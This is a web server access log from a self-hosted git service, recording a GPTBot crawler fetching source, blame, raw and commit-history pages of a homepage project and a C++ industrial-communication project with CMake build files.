"/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" +[17/Feb/2026:15:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" +[17/Feb/2026:15:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13899] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" +[17/Feb/2026:15:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md?display=source" [Client 74.7.227.38] [Length 11753] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" +[17/Feb/2026:15:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11318] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" +[17/Feb/2026:15:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13178] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13183] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13122] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13180] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 11737] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13178] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13178] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 11735] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 11735] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11039] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15109] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13671] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11040] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15106] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13698] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10192] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10924] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21633] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9977] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21630] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9974] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21680] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21677] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15361] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15364] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11017] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr 